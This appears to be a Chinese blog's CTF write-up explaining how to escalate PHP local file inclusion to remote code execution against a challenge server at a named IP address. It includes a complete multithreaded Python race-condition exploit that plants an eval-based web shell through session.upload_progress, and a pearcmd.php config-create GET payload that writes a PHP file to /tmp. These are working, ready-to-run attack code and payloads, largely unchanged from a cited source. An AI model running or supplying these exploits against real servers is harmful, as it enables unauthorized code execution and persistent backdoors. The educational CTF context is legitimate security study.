<!DOCTYPE html><html lang="zh-cn"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icon.jpg?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icon.jpg?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="笨比       http:&#x2F;&#x2F;81.70.102.209:10040&#x2F;index.php  1234&lt;?php    show_source(&amp;#x27;.&#x2F;index.php&amp;#x27;);    include $_GET[&amp;#x27;file&amp;#x27;];?&gt;  做题时，试了各种伪协议，最后得出的结论是，allow_url_includ">
<meta property="og:type" content="article">
<meta property="og:title" content="LFI_to_RCE">
<meta property="og:url" content="http://example.com/2021/11/16/LFI-to-RCE/index.html">
<meta property="og:site_name" content="Biscuit19_">
<meta property="og:description" content="笨比       http:&#x2F;&#x2F;81.70.102.209:10040&#x2F;index.php  1234&lt;?php    show_source(&amp;#x27;.&#x2F;index.php&amp;#x27;);    include $_GET[&amp;#x27;file&amp;#x27;];?&gt;  做题时，试了各种伪协议，最后得出的结论是，allow_url_includ">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160105326.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108214.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108216.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108217.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108218.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108219.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108220.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2021/11/01/661223a3-6bfb-4ef2-ad14-0a6bc53128fa.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108221.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108222.png">
<meta property="article:published_time" content="2021-11-15T17:07:29.000Z">
<meta property="article:modified_time" content="2021-11-15T17:11:52.871Z">
<meta property="article:author" content="Biscuit19_">
<meta property="article:tag" content="文件包含">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160105326.png"><title>LFI_to_RCE | Biscuit19_</title><link ref="canonical" href="http://example.com/2021/11/16/LFI-to-RCE/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"100px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"light","wordWrap":true},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copiar","copySuccess":"Éxito en copia","copyError":"Error en copia"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Inicio</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archivos</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categorías</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Etiquetas</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Biscuit19_</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">LFI_to_RCE</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Creado</span><span class="post-meta-item__value">2021-11-16</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Actualizado</span><span class="post-meta-item__value">2021-11-16</span></span></div></header><div class="post-body">
        <h1 id="笨比"   >
          <a href="#笨比" class="heading-link"><i class="fas fa-link"></i></a><a href="#笨比" class="headerlink" title="笨比"></a>笨比</h1>
      <p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://81.70.102.209:10040/index.php" >http://81.70.102.209:10040/index.php</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160105326.png" alt="image-20211116010445092"></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    show_source(<span class="string">&#x27;./index.php&#x27;</span>);</span><br><span class="line">    <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>做题时，试了各种伪协议，最后得出的结论是，allow_url_include=off，所以很多写入的命令我们就无法执行，我们只能查看文件，又查看了一些敏感文件，发现一些文件又没有查看权限，又拿字典扫了一会儿，也没啥收获。</p>
<p>赛后根据出题人提示，去看了p神的一篇博客<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://tttang.com/archive/1312/#toc_0x01%E5%AD%A6%E5%88%B0%E4%BA%86%E4%B8%80%E4%B8%AAsession%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E6%96%B9%E6%B3%95%E3%80%82" >https://tttang.com/archive/1312/#toc_0x01学到了一个session临时文件包含的方法。</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h1 id="原理1"   >
          <a href="#原理1" class="heading-link"><i class="fas fa-link"></i></a><a href="#原理1" class="headerlink" title="原理1"></a>原理1</h1>
      
        <h2 id="1-临时文件包含"   >
          <a href="#1-临时文件包含" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-临时文件包含" class="headerlink" title="1.临时文件包含"></a>1.临时文件包含</h2>
      <p>我们对任意一个PHP文件发送一个上传的数据包时，<strong>不管这个PHP服务后端是否有处理<code>$_FILES</code>的逻辑，PHP都会将用户上传的数据先保存到一个临时文件中</strong>，这个文件一般位于系统临时目录，文件名是php开头，后面跟6个随机字符；在整个PHP文件执行完毕后，这些上传的临时文件就会被清理掉。</p>
<p>在本题中，我们无从知晓后六位的随机字符，行不太通。</p>

        <h2 id="2-session-upload-progress与Session文件包含"   >
          <a href="#2-session-upload-progress与Session文件包含" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-session-upload-progress与Session文件包含" class="headerlink" title="2.session.upload_progress与Session文件包含"></a>2.session.upload_progress与Session文件包含</h2>
      
        <h3 id="1-session-upload-progress"   >
          <a href="#1-session-upload-progress" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-session-upload-progress" class="headerlink" title="1.session.upload_progress"></a>1.session.upload_progress</h3>
      <p>当 session.upload_progress.enabled INI 选项开启时，PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助，但在文件上传时应用可以发送一个POST请求到终端（例如通过XHR）来检查这个状态。当一个上传在处理中，同时POST一个与INI中设置的session.upload_progress.name同名变量时，上传进度可以在$_SESSION中获得。 当PHP检测到这种POST请求时，它会在$_SESSION中添加一组数据, 索引是session.upload_progress.prefix与 session.upload_progress.name连接在一起的值</p>
<p>php.ini文件中的session.upload_progress支持：</p>
<figure class="highlight ini"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">session.upload_progress.enabled</span> = <span class="literal">On</span> </span><br><span class="line"><span class="attr">session.upload_progress.cleanup</span> = <span class="literal">On</span> 默认<span class="literal">on</span></span><br><span class="line"></span><br><span class="line"><span class="attr">session.upload_progress.prefix</span> = <span class="string">&quot;upload_progress_&quot;</span> </span><br><span class="line">（session文件里upload_progress的前缀）</span><br><span class="line"><span class="attr">session.upload_progress.name</span> = <span class="string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span>（post发的请求中需要的参数名，最后会作为session文件里upload_progress的名字）</span><br></pre></td></tr></table></div></figure>

<p>session文件中的示例：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload_progress_POSTNAME|a:5:&#123;s:10:&quot;start_time&quot;;i:1636908253;s:14:&quot;content_length&quot;;i:41312;s:15:&quot;bytes_processed&quot;;i:5301;s:4:&quot;done&quot;.....</span><br></pre></td></tr></table></div></figure>

<p>其中，POSTNAME就是POPST传过去的参数值。</p>

        <h3 id="2-利用原理与条件"   >
          <a href="#2-利用原理与条件" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-利用原理与条件" class="headerlink" title="2.利用原理与条件"></a>2.利用原理与条件</h3>
      <p>PHP在开启了<code>session.upload_progress.enable</code>后（在包括Docker的大部分环境下默认是开启的），将会把用户<strong>上传文件的信息</strong>保存在Session中，<strong>而PHP的Session默认是保存在文件里的</strong>。</p>
<p>PHP中可以通过session progress功能实现临时文件的写入。这种利用方式需要满足下面几个条件：</p>
<ul>
<li>目标环境开启了<code>session.upload_progress.enable</code>选项</li>
<li>发送一个文件上传请求，其中包含一个文件表单和一个名字是<code>PHP_SESSION_UPLOAD_PROGRESS</code>的字段</li>
<li>请求的Cookie中包含Session ID（启用了session）</li>
</ul>
<p>这个方法的原理是，PHP在开启了<code>session.upload_progress.enable</code>后（在包括Docker的大部分环境下默认是开启的），将会把用户上传文件的信息保存在Session中，而PHP的Session默认是保存在文件里的。</p>
<p>所以当攻击者发送满足上述条件的数据包时，就等于能够控制<strong>Session文件内容。</strong></p>
<p><strong>但是PHP中还有另外一个配置项<code>session.upload_progress.cleanup</code>，默认开启。</strong>在这个选项开启时，PHP会在<strong>上传请求被读取完成后自动清理掉这个Session</strong>，<strong>注意：这里session文件不会被删除，但是内容会被清空，所以我们还是要在条件竞争中包含这个session</strong></p>
<p>​    所以，默认情况下，我们需要在Session文件被清理前利用它，这也会用到条件竞争（Race Condition），也就是需要多线程来并发执行，力求在/tmp/sess_PHPSESSID被清除之前，就能执行文件包含，执行我们的木马php命令。</p>

        <h1 id="实现1"   >
          <a href="#实现1" class="heading-link"><i class="fas fa-link"></i></a><a href="#实现1" class="headerlink" title="实现1"></a>实现1</h1>
      <p>直接贴博客中写好的代码，我对其理解写在注释中</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> concurrent.futures <span class="keyword">import</span> ThreadPoolExecutor, wait</span><br><span class="line"></span><br><span class="line">target = <span class="string">&#x27;http://81.70.102.209:10040/index.php&#x27;</span></span><br><span class="line">session = requests.session()</span><br><span class="line">flag = <span class="string">&#x27;shellsuccess&#x27;</span><span class="comment">#判断标识/sessionID</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload</span>(<span class="params">e: threading.Event</span>):</span><span class="comment">#多线程，upload发文件</span></span><br><span class="line">   files = [</span><br><span class="line">      (<span class="string">&#x27;file&#x27;</span>, (<span class="string">&#x27;load.png&#x27;</span>, <span class="string">b&#x27;a&#x27;</span> * <span class="number">40960</span>, <span class="string">&#x27;image/png&#x27;</span>)),<span class="comment">#制作了一张图片文件</span></span><br><span class="line">   ]</span><br><span class="line">   <span class="comment">#PHP_SESSION_UPLOAD_PROGRESS字段</span></span><br><span class="line">   data = &#123;<span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: <span class="string">rf&#x27;&#x27;&#x27;&lt;?php file_put_contents(&#x27;/tmp/success2&#x27;, &#x27;&lt;?php @eval($_POST[&quot;duo&quot;]);?&gt;&#x27;); echo(&#x27;<span class="subst">&#123;flag&#125;</span>&#x27;); ?&gt;&#x27;&#x27;&#x27;</span>&#125;</span><br><span class="line">   <span class="comment">#这句话的意思是在PHP_SESSION_UPLOAD_PROGRESS中写进了一段php代码，这段代码最后会存到/tmp/sess_PHPSESSID中</span></span><br><span class="line">   <span class="comment">#这段php代码把木马写进并创造了/tmp/success这个文件里，然后又在本代码中输出了flag</span></span><br><span class="line">   <span class="comment">#为什么代码会被执行，因为include会把文件内容按php解析并执行，</span></span><br><span class="line">   <span class="comment"># 尽管/tmp/sess_PHPSESSID里还有很多别的信息，它们无法被php解析</span></span><br><span class="line">   <span class="comment">#但&lt;?php ?&gt;内的内容，仍会被正常解析，导致任意命令执行，在这里，我们写入了php木马。</span></span><br><span class="line"></span><br><span class="line">   <span class="keyword">while</span> <span class="keyword">not</span> e.is_set():<span class="comment">#e没被set，一直执行</span></span><br><span class="line">      requests.post(<span class="comment">#发包，</span></span><br><span class="line">         target,</span><br><span class="line">         data=data,</span><br><span class="line">         files=files,<span class="comment">#发文件</span></span><br><span class="line">         cookies=&#123;<span class="string">&#x27;PHPSESSID&#x27;</span>: flag&#125;,<span class="comment">#这是随便写了个PHPSESSID，这个会被放在/tmp/sess_PHPSESSID里</span></span><br><span class="line">      )</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">e: threading.Event</span>):</span><span class="comment">#多线程，判断是否程序</span></span><br><span class="line">   <span class="keyword">while</span> <span class="keyword">not</span> e.is_set():</span><br><span class="line">      response = requests.get(</span><br><span class="line">         <span class="string">f&#x27;<span class="subst">&#123;target&#125;</span>?file=/tmp/sess_<span class="subst">&#123;flag&#125;</span>&#x27;</span>,</span><br><span class="line">         <span class="comment">#给文件包含网站发请求，使其包含/tmp/sess_PHPSESSID这个文件</span></span><br><span class="line">         <span class="comment">#而这个文件里有echo(&#x27;&#123;flag&#125;&#x27;);这句话，如果包含成功，则页面上会有&#123;flag&#125;字符回显</span></span><br><span class="line">      )</span><br><span class="line">      <span class="built_in">print</span>(response.content)</span><br><span class="line">      <span class="keyword">if</span> flag.encode() <span class="keyword">in</span> response.content:<span class="comment">#如果&#123;flag&#125;字符回显，说明文件包含成功，也说明文件执行成功了，木马已经写入了/tmp/success</span></span><br><span class="line">         <span class="built_in">print</span>(<span class="string">&quot;木马写入成功&quot;</span>)</span><br><span class="line">         e.<span class="built_in">set</span>()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">   futures = []</span><br><span class="line">   event = threading.Event()</span><br><span class="line">   pool = ThreadPoolExecutor(<span class="number">15</span>)<span class="comment">#进程池，15个进程</span></span><br><span class="line">   <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">      futures.append(pool.submit(upload, event))</span><br><span class="line"></span><br><span class="line">   <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line">      futures.append(pool.submit(write, event))</span><br><span class="line"></span><br><span class="line">   wait(futures)<span class="comment">#应该是执行进程</span></span><br></pre></td></tr></table></div></figure>

<p>解析其中比较重要的代码</p>

        <h2 id="cookies-‘PHPSESSID’-flag"   >
          <a href="#cookies-‘PHPSESSID’-flag" class="heading-link"><i class="fas fa-link"></i></a><a href="#cookies-‘PHPSESSID’-flag" class="headerlink" title="cookies={‘PHPSESSID’: flag},"></a>cookies={‘PHPSESSID’: flag},</h2>
      <p>这句话是自己构造了一个PHPSESSID，这样当session产生临时session文件时，我们就知道它的姓名了，**/tmp/sess_PHPSESSID文件**</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108214.png" alt="image-20211115111854684"></p>
<p>这个tmp是系统根目录,不是网站根目录</p>
<p>同样的，这需要<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.php.net/manual/zh/session.configuration.php#ini.session.use-strict-mode" >session.use_strict_mode</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>=Off：产生会话ID</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108216.png" alt="image-20211115015332481"></p>

        <h2 id="data"   >
          <a href="#data" class="heading-link"><i class="fas fa-link"></i></a><a href="#data" class="headerlink" title="data"></a>data</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data = &#123;<span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: rf<span class="string">&#x27;&#x27;</span><span class="string">&#x27;&lt;?php file_put_contents(&#x27;</span>/tmp/success2<span class="string">&#x27;, &#x27;</span><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;duo&quot;</span>]);<span class="meta">?&gt;</span><span class="string">&#x27;); echo(&#x27;</span>&#123;flag&#125;<span class="string">&#x27;); ?&gt;&#x27;</span><span class="string">&#x27;&#x27;</span>&#125;</span><br></pre></td></tr></table></div></figure>

<p>我们来解析比较重要的这句话，PHP_SESSION_UPLOAD_PROGRESS是之前我们定下的参数名，（这里是采用了默认的参数名，如果改了的话，这个方法也会失效）</p>
<p>注意，这里生成的/tmp/success2是一个没后缀的文件，但也是文件，被包含时一样被解析为php执行。</p>
<p>rf’’’  ‘’’应该是格式化字符串，</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php file_put_contents(&#x27;/tmp/success2&#x27;, &#x27;&lt;?php @eval($_POST[&quot;duo&quot;]);?&gt;&#x27;); echo(&#x27;&#123;flag&#125;&#x27;); ?&gt;</span><br></pre></td></tr></table></div></figure>

<p> 是我们写入的内容，我们把它写在了上传文件时，临时产生的session文件：/tmp/sess_PHPSESSID中，它的代码内容是</p>
<p>1.创建一个shell文件——/tmp/success2，然后在shell文件中写入’<?php @eval($_POST["duo"]);?>‘</p>
<p>2.输出 echo(‘{flag}’); 这句话的作用是用于判断我们是否写入成功了的。</p>

        <h2 id="验证"   >
          <a href="#验证" class="heading-link"><i class="fas fa-link"></i></a><a href="#验证" class="headerlink" title="验证"></a>验证</h2>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">response = requests.get(</span><br><span class="line">         f&#x27;&#123;target&#125;?file=/tmp/sess_&#123;flag&#125;&#x27;,</span><br><span class="line">      )</span><br><span class="line">      if flag.encode() in response.content</span><br></pre></td></tr></table></div></figure>

<p>判断方法是这样的，由于上传文件时临时创建了/tmp/sess_PHPSESSID文件，现在我们要利用include来执行它，那我们怎么判断我们执行成功了呢，就用我们写入的echo(‘{flag}’);来判断，如果我们得到的网页回显中，输出了我们的flag，说明这个/tmp/sess_PHPSESSID文件已经被解析执行了，下面是一个回显的示例：</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108217.png" alt="image-20211115015943526"></p>
<p>这样我们的木马就写入成功了，用蚁剑连接，拿到flag:</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108218.png" alt="image-20211115020027362"></p>

        <h1 id="原理2"   >
          <a href="#原理2" class="heading-link"><i class="fas fa-link"></i></a><a href="#原理2" class="headerlink" title="原理2"></a>原理2</h1>
      
        <h3 id="pear-pecl、"   >
          <a href="#pear-pecl、" class="heading-link"><i class="fas fa-link"></i></a><a href="#pear-pecl、" class="headerlink" title="pear/pecl、"></a>pear/pecl、</h3>
      
        <h4 id="什么东西"   >
          <a href="#什么东西" class="heading-link"><i class="fas fa-link"></i></a><a href="#什么东西" class="headerlink" title="什么东西"></a>什么东西</h4>
      <p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108219.png" alt="image-20211115215142909"></p>
<p>pecl是PHP中用于管理扩展而使用的命令行工具，而pear是pecl依赖的类库。</p>
<p>pecl/pear中有一个文件 pearcmd.php。</p>

        <h4 id="利用条件"   >
          <a href="#利用条件" class="heading-link"><i class="fas fa-link"></i></a><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h4>
      <p>在7.3及以前，pecl/pear是默认安装的；在7.4及以后，需要我们在编译PHP的时候指定<code>--with-pear</code>才会安装。</p>
<p>不过，在Docker任意版本镜像中，pcel/pear都会被默认安装，安装的路径在<code>/usr/local/lib/php</code>。</p>
<p>原本它只是一个命令行工具，不在web目录下面，但是我们现在能文件包含，我们可包含到pear中，利用它的命令来做事。</p>

        <h4 id="利用方法"   >
          <a href="#利用方法" class="heading-link"><i class="fas fa-link"></i></a><a href="#利用方法" class="headerlink" title="利用方法"></a>利用方法</h4>
      
        <h5 id="1-config-create"   >
          <a href="#1-config-create" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-config-create" class="headerlink" title="1.config-create"></a><strong>1.config-create</strong></h5>
      <p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108220.png" alt="image-20211115215513426"></p>
<p>利用它的一个命令，config-create来创建一个文件，它有两个参数，第一个参数是文件内容，第二个参数是写入的路径。</p>

        <h5 id="2-SERVER-‘argv’"   >
          <a href="#2-SERVER-‘argv’" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-SERVER-‘argv’" class="headerlink" title="2.$_SERVER[‘argv’]"></a><strong>2.$_SERVER[‘argv’]</strong></h5>
      <p>​    发现Docker环境下的PHP会开启<code>register_argc_argv</code>这个配置。当开启了这个选项，用户的输入将会被赋予给<code>$argc</code>、<code>$argv</code>、<code>$_SERVER[&#39;argv&#39;]</code>几个变量。他们都是全局变量，为传递给脚本的参数数组——</p>
<p>$argc — 传递给脚本的参数数目</p>
<p>$argv — 传递给脚本的参数数组</p>
<p>而$_SERVER[‘argv’]这个参数是我们可以利用的，argv是命令行参数，RFC3875中规定，如果query-string中不包含<code>=</code>，且请求是GET或HEAD，则query-string需要被作为命令行参数。<strong>也就是说，如果我们传递的参数没有键（参数名），那这个参数就会变成命令行参数argv。</strong></p>
<p>（query-string是指我们在url中传的参数）<img src="https://storage.tttang.com/media/attachment/2021/11/01/661223a3-6bfb-4ef2-ad14-0a6bc53128fa.png" alt="image-20211101072557483.png"></p>
<p>而pear又会去命令行中获取argv：</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108221.png" alt="image-20211116005524798"></p>
<p>所以，这就很巧了，我们传入命令行参数argv，再包含pearcmd.php来运行它，也就是运行我们传入的命令，结合它的 config-create 命令创建shell文件。</p>

        <h5 id="3-payload"   >
          <a href="#3-payload" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-payload" class="headerlink" title="3.payload"></a>3.payload</h5>
      <p>最后，得到的payload如下：（p神的）</p>
<p>/index.php?+config-create+/&amp;file=/usr/local/lib/php/pearcmd.php&amp;/<?=phpinfo()?>+/tmp/shell.php    </p>
<p>这里的+号是空格的意思，是空格被编码变成了+号，所以最后的命令行参数就是：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">config-create //&lt;?=phpinfo()?&gt; /tmp/shell.php</span><br></pre></td></tr></table></div></figure>

<figure class="highlight http"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/index.php?+config-create+/&amp;file=/usr/local/lib/php/pearcmd.php&amp;/&lt;?=phpinfo()?&gt;+/tmp/shell.php</span> <span class="meta">HTTP/1.1</span></span><br></pre></td></tr></table></div></figure>

<p>我自己又尝试了一下，我发现去掉<?=phpinfo()?>前面的/也可以运行：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">file=/usr/local/lib/php/pearcmd.php&amp;+config-create+/&amp;<span class="meta">&lt;?=</span>phpinfo()<span class="meta">?&gt;</span>+/tmp/bis2.php</span><br><span class="line">三个参数:</span><br><span class="line">	file=/usr/local/lib/php/pearcmd.php</span><br><span class="line">    +config-create+/</span><br><span class="line">    <span class="meta">&lt;?=</span>phpinfo()<span class="meta">?&gt;</span>+/tmp/bis2.php</span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">config-create /&lt;?=phpinfo()?&gt; /tmp/shell.php</span><br></pre></td></tr></table></div></figure>

<p>但是config-create / 里的/不能去掉，它应该代表的是根目录的意思，应该是一个固定的参数：</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111160108222.png" alt="image-20211116010232266"></p>
<p>最后，shell被写到了/tmp/shell.php下，成功获取</p>

        <h1 id="收获："   >
          <a href="#收获：" class="heading-link"><i class="fas fa-link"></i></a><a href="#收获：" class="headerlink" title="收获："></a>收获：</h1>
      <p>一篇大神写的好博客强于我在百度搜一整晚</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ FIN ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Autor: </span><span class="copyright-author__value"><a href="http://example.com">Biscuit19_</a></span></div><div class="copyright-link"><span class="copyright-link__name">Enlace: </span><span class="copyright-link__value"><a href="http://example.com/2021/11/16/LFI-to-RCE/">http://example.com/2021/11/16/LFI-to-RCE/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">Todos los artículos de este blog están bajo licencia  de <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> a menos que se indique lo contrario</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" 